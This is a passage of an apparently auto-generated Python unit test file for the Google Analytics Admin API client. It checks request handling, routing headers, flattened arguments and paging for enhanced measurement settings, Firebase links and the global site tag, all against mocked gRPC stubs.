Set these to a non-empty value. request = analytics_admin.UpdateEnhancedMeasurementSettingsRequest() request.enhanced_measurement_settings.name = ( "enhanced_measurement_settings.name/value" ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_enhanced_measurement_settings), "__call__" ) as call: call.return_value = resources.EnhancedMeasurementSettings() client.update_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "enhanced_measurement_settings.name=enhanced_measurement_settings.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_enhanced_measurement_settings_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateEnhancedMeasurementSettingsRequest() request.enhanced_measurement_settings.name = ( "enhanced_measurement_settings.name/value" ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_enhanced_measurement_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.EnhancedMeasurementSettings() ) await client.update_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        "x-goog-request-params",
        "enhanced_measurement_settings.name=enhanced_measurement_settings.name/value",
    ) in kw["metadata"]


def test_update_enhanced_measurement_settings_flattened():
    """Flattened keyword args must be packed into the request message."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_enhanced_measurement_settings), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.EnhancedMeasurementSettings()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.update_enhanced_measurement_settings(
            enhanced_measurement_settings=resources.EnhancedMeasurementSettings(
                name="name_value"
            ),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[
            0
        ].enhanced_measurement_settings == resources.EnhancedMeasurementSettings(
            name="name_value"
        )
        assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"])


def test_update_enhanced_measurement_settings_flattened_error():
    """Mixing a request object with flattened fields must raise ValueError."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.update_enhanced_measurement_settings(
            analytics_admin.UpdateEnhancedMeasurementSettingsRequest(),
            enhanced_measurement_settings=resources.EnhancedMeasurementSettings(
                name="name_value"
            ),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )


@pytest.mark.asyncio
async def test_update_enhanced_measurement_settings_flattened_async():
    """Async variant: flattened kwargs are packed into the request message."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_enhanced_measurement_settings), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.EnhancedMeasurementSettings()
        # The async surface awaits the stub, so the final return value is a
        # fake unary-unary call wrapping the response message.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.EnhancedMeasurementSettings()
        )
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.update_enhanced_measurement_settings(
            enhanced_measurement_settings=resources.EnhancedMeasurementSettings(
                name="name_value"
            ),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[
            0
        ].enhanced_measurement_settings == resources.EnhancedMeasurementSettings(
            name="name_value"
        )
        assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"])


@pytest.mark.asyncio
async def test_update_enhanced_measurement_settings_flattened_error_async():
    """Async variant: request object plus flattened fields must raise."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.update_enhanced_measurement_settings(
            analytics_admin.UpdateEnhancedMeasurementSettingsRequest(),
            enhanced_measurement_settings=resources.EnhancedMeasurementSettings(
                name="name_value"
            ),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )


def test_create_firebase_link(
    transport: str = "grpc", request_type=analytics_admin.CreateFirebaseLinkRequest
):
    """CreateFirebaseLink sends the request and maps response fields."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_firebase_link), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.FirebaseLink(
            name="name_value", project="project_value",
        )
        response = client.create_firebase_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreateFirebaseLinkRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.FirebaseLink)
    assert response.name == "name_value"
    assert response.project == "project_value"


def test_create_firebase_link_from_dict():
    """The request may also be supplied as a plain dict."""
    test_create_firebase_link(request_type=dict)


def test_create_firebase_link_empty_call():
    """A call with no request and no flattened fields still succeeds."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_firebase_link), "__call__"
    ) as call:
        client.create_firebase_link()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        # An empty call still produces a default request object.
        assert args[0] == analytics_admin.CreateFirebaseLinkRequest()


@pytest.mark.asyncio
async def test_create_firebase_link_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.CreateFirebaseLinkRequest,
):
    """Async variant: CreateFirebaseLink sends the request and maps fields."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_firebase_link), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.FirebaseLink(name="name_value", project="project_value",)
        )
        response = await client.create_firebase_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreateFirebaseLinkRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.FirebaseLink)
    assert response.name == "name_value"
    assert response.project == "project_value"


@pytest.mark.asyncio
async def test_create_firebase_link_async_from_dict():
    """Async variant: the request may also be supplied as a plain dict."""
    await test_create_firebase_link_async(request_type=dict)


def test_create_firebase_link_field_headers():
    """Routing fields must be propagated as x-goog-request-params metadata."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.CreateFirebaseLinkRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_firebase_link), "__call__"
    ) as call:
        call.return_value = resources.FirebaseLink()
        client.create_firebase_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_create_firebase_link_field_headers_async():
    """Async variant: routing fields propagate as request-params metadata."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.CreateFirebaseLinkRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_firebase_link), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.FirebaseLink()
        )
        await client.create_firebase_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


def test_create_firebase_link_flattened():
    """Flattened keyword args must be packed into the request message."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_firebase_link), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.FirebaseLink()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.create_firebase_link(
            parent="parent_value",
            firebase_link=resources.FirebaseLink(name="name_value"),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == "parent_value"
        assert args[0].firebase_link == resources.FirebaseLink(name="name_value")


def test_create_firebase_link_flattened_error():
    """Mixing a request object with flattened fields must raise ValueError."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.create_firebase_link(
            analytics_admin.CreateFirebaseLinkRequest(),
            parent="parent_value",
            firebase_link=resources.FirebaseLink(name="name_value"),
        )


@pytest.mark.asyncio
async def test_create_firebase_link_flattened_async():
    """Async variant: flattened kwargs are packed into the request message."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_firebase_link), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.FirebaseLink()
        # The async surface awaits the stub, so the final return value is a
        # fake unary-unary call wrapping the response message.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.FirebaseLink()
        )
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.create_firebase_link(
            parent="parent_value",
            firebase_link=resources.FirebaseLink(name="name_value"),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == "parent_value"
        assert args[0].firebase_link == resources.FirebaseLink(name="name_value")


@pytest.mark.asyncio
async def test_create_firebase_link_flattened_error_async():
    """Async variant: request object plus flattened fields must raise."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.create_firebase_link(
            analytics_admin.CreateFirebaseLinkRequest(),
            parent="parent_value",
            firebase_link=resources.FirebaseLink(name="name_value"),
        )


def test_delete_firebase_link(
    transport: str = "grpc", request_type=analytics_admin.DeleteFirebaseLinkRequest
):
    """DeleteFirebaseLink sends the request; the RPC returns Empty (None)."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_firebase_link), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        response = client.delete_firebase_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteFirebaseLinkRequest()

    # Establish that the response is the type that we expect.
    assert response is None


def test_delete_firebase_link_from_dict():
    """The request may also be supplied as a plain dict."""
    test_delete_firebase_link(request_type=dict)


def test_delete_firebase_link_empty_call():
    """A call with no request and no flattened fields still succeeds."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_firebase_link), "__call__"
    ) as call:
        client.delete_firebase_link()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        # An empty call still produces a default request object.
        assert args[0] == analytics_admin.DeleteFirebaseLinkRequest()


@pytest.mark.asyncio
async def test_delete_firebase_link_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.DeleteFirebaseLinkRequest,
):
    """Async variant: DeleteFirebaseLink sends the request; returns None."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_firebase_link), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        response = await client.delete_firebase_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteFirebaseLinkRequest()

    # Establish that the response is the type that we expect.
    assert response is None


@pytest.mark.asyncio
async def test_delete_firebase_link_async_from_dict():
    """Async variant: the request may also be supplied as a plain dict."""
    await test_delete_firebase_link_async(request_type=dict)


def test_delete_firebase_link_field_headers():
    """Routing fields must be propagated as x-goog-request-params metadata."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.DeleteFirebaseLinkRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_firebase_link), "__call__"
    ) as call:
        call.return_value = None
        client.delete_firebase_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_delete_firebase_link_field_headers_async():
    """Async variant: routing fields propagate as request-params metadata."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.DeleteFirebaseLinkRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_firebase_link), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        await client.delete_firebase_link(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_delete_firebase_link_flattened():
    """Flattened keyword args must be packed into the request message."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_firebase_link), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.delete_firebase_link(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


def test_delete_firebase_link_flattened_error():
    """Mixing a request object with flattened fields must raise ValueError."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.delete_firebase_link(
            analytics_admin.DeleteFirebaseLinkRequest(), name="name_value",
        )


@pytest.mark.asyncio
async def test_delete_firebase_link_flattened_async():
    """Async variant: flattened kwargs are packed into the request message."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_firebase_link), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        # The async surface awaits the stub, so the final return value is a
        # fake unary-unary call wrapping the (empty) response.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.delete_firebase_link(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


@pytest.mark.asyncio
async def test_delete_firebase_link_flattened_error_async():
    """Async variant: request object plus flattened fields must raise."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.delete_firebase_link(
            analytics_admin.DeleteFirebaseLinkRequest(), name="name_value",
        )


def test_list_firebase_links(
    transport: str = "grpc", request_type=analytics_admin.ListFirebaseLinksRequest
):
    """ListFirebaseLinks sends the request and wraps the response in a pager."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_firebase_links), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.ListFirebaseLinksResponse(
            next_page_token="next_page_token_value",
        )
        response = client.list_firebase_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListFirebaseLinksRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListFirebaseLinksPager)
    assert response.next_page_token == "next_page_token_value"


def test_list_firebase_links_from_dict():
    """The request may also be supplied as a plain dict."""
    test_list_firebase_links(request_type=dict)


def test_list_firebase_links_empty_call():
    """A call with no request and no flattened fields still succeeds."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_firebase_links), "__call__"
    ) as call:
        client.list_firebase_links()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        # An empty call still produces a default request object.
        assert args[0] == analytics_admin.ListFirebaseLinksRequest()


@pytest.mark.asyncio
async def test_list_firebase_links_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.ListFirebaseLinksRequest,
):
    """Async variant: ListFirebaseLinks returns an async pager."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_firebase_links), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ListFirebaseLinksResponse(
                next_page_token="next_page_token_value",
            )
        )
        response = await client.list_firebase_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListFirebaseLinksRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListFirebaseLinksAsyncPager)
    assert response.next_page_token == "next_page_token_value"


@pytest.mark.asyncio
async def test_list_firebase_links_async_from_dict():
    """Async variant: the request may also be supplied as a plain dict."""
    await test_list_firebase_links_async(request_type=dict)


def test_list_firebase_links_field_headers():
    """Routing fields must be propagated as x-goog-request-params metadata."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ListFirebaseLinksRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_firebase_links), "__call__"
    ) as call:
        call.return_value = analytics_admin.ListFirebaseLinksResponse()
        client.list_firebase_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_list_firebase_links_field_headers_async():
    """Async variant: routing fields propagate as request-params metadata."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ListFirebaseLinksRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_firebase_links), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ListFirebaseLinksResponse()
        )
        await client.list_firebase_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


def test_list_firebase_links_flattened():
    """Flattened keyword args must be packed into the request message."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_firebase_links), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.ListFirebaseLinksResponse()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.list_firebase_links(parent="parent_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == "parent_value"


def test_list_firebase_links_flattened_error():
    """Mixing a request object with flattened fields must raise ValueError."""
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.list_firebase_links(
            analytics_admin.ListFirebaseLinksRequest(), parent="parent_value",
        )


@pytest.mark.asyncio
async def test_list_firebase_links_flattened_async():
    """Async variant: flattened kwargs are packed into the request message."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_firebase_links), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.ListFirebaseLinksResponse()
        # The async surface awaits the stub, so the final return value is a
        # fake unary-unary call wrapping the response message.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ListFirebaseLinksResponse()
        )
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.list_firebase_links(parent="parent_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == "parent_value"


@pytest.mark.asyncio
async def test_list_firebase_links_flattened_error_async():
    """Async variant: request object plus flattened fields must raise."""
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
with pytest.raises(ValueError): await client.list_firebase_links( analytics_admin.ListFirebaseLinksRequest(), parent="parent_value", ) def test_list_firebase_links_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListFirebaseLinksResponse( firebase_links=[ resources.FirebaseLink(), resources.FirebaseLink(), resources.FirebaseLink(), ], next_page_token="abc", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[], next_page_token="def", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(),], next_page_token="ghi", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(), resources.FirebaseLink(),], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_firebase_links(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.FirebaseLink) for i in results) def test_list_firebase_links_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__" ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListFirebaseLinksResponse( firebase_links=[ resources.FirebaseLink(), resources.FirebaseLink(), resources.FirebaseLink(), ], next_page_token="abc", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[], next_page_token="def", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(),], next_page_token="ghi", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(), resources.FirebaseLink(),], ), RuntimeError, ) pages = list(client.list_firebase_links(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_firebase_links_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListFirebaseLinksResponse( firebase_links=[ resources.FirebaseLink(), resources.FirebaseLink(), resources.FirebaseLink(), ], next_page_token="abc", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[], next_page_token="def", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(),], next_page_token="ghi", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(), resources.FirebaseLink(),], ), RuntimeError, ) async_pager = await client.list_firebase_links(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.FirebaseLink) for i in responses) @pytest.mark.asyncio async def test_list_firebase_links_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_firebase_links), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListFirebaseLinksResponse( firebase_links=[ resources.FirebaseLink(), resources.FirebaseLink(), resources.FirebaseLink(), ], next_page_token="abc", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[], next_page_token="def", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(),], next_page_token="ghi", ), analytics_admin.ListFirebaseLinksResponse( firebase_links=[resources.FirebaseLink(), resources.FirebaseLink(),], ), RuntimeError, ) pages = [] async for page_ in (await client.list_firebase_links(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_global_site_tag( transport: str = "grpc", request_type=analytics_admin.GetGlobalSiteTagRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_global_site_tag), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.GlobalSiteTag( name="name_value", snippet="snippet_value", ) response = client.get_global_site_tag(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = 